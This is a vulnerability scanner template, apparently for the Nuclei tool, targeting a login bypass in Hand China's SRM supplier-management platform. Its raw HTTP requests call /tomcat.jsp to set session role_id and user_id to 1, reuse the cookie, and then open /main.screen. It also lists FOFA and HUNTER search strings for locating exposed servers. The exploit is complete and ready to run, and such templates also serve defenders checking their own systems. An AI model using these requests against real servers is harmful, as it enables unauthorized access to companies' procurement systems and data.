id: hand-china-srm-tomcat-jsp-login-bypass

info:
  name: 汉得 SRM tomcat.jsp 登录绕过漏洞
  author: SleepingBag945
  severity: high
  description: |-
    FOFA: 汉得SRM云平台
    HUNTER: web.body="汉得SRM"
  tags: hand-china,bypass,login

http:
  - raw:
      - |
        GET /tomcat.jsp?dataName=role_id&dataValue=1 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /tomcat.jsp?dataName=user_id&dataValue=1 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /main.screen HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: status
        part: status_code_1
        status:
          - 200
      - type: status
        part: status_code_2
        status:
          - 200
      - type: status
        part: status_code_3
        status:
          - 200
      - type: word
        part: body_1
        words:
          - "Server Info:"
          - "SRM SERVER Info."
      - type: word
        part: body_2
        words:
          - "Server Info:"
          - "SRM SERVER Info."